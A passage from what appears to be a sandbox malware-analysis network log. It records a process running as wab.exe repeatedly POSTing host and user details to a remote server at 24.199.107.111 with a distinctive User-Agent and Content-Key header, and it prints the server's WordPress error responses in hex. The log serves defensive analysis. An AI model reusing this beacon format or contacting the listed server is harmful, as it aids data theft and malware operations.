09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:14:52.517352104 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:14:52.517457008 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.54971824.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:14:52.788913965 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 180
                                                                              Connection: close
                                                                              Apr 18, 2024 21:14:52.951484919 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: 'ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C1lEmU
                                                                              Apr 18, 2024 21:14:53.740020990 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:14:52 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:14:53.740044117 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:14:53.740058899 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.54971924.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:14:54.064384937 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:14:54.226914883 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:14:55.070197105 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:14:54 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:14:55.070220947 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:14:55.070234060 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.54972024.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:14:55.405038118 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:14:55.567576885 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:14:56.385894060 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:14:55 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:14:56.385915041 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:14:56.385927916 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.54972224.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:14:56.706824064 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
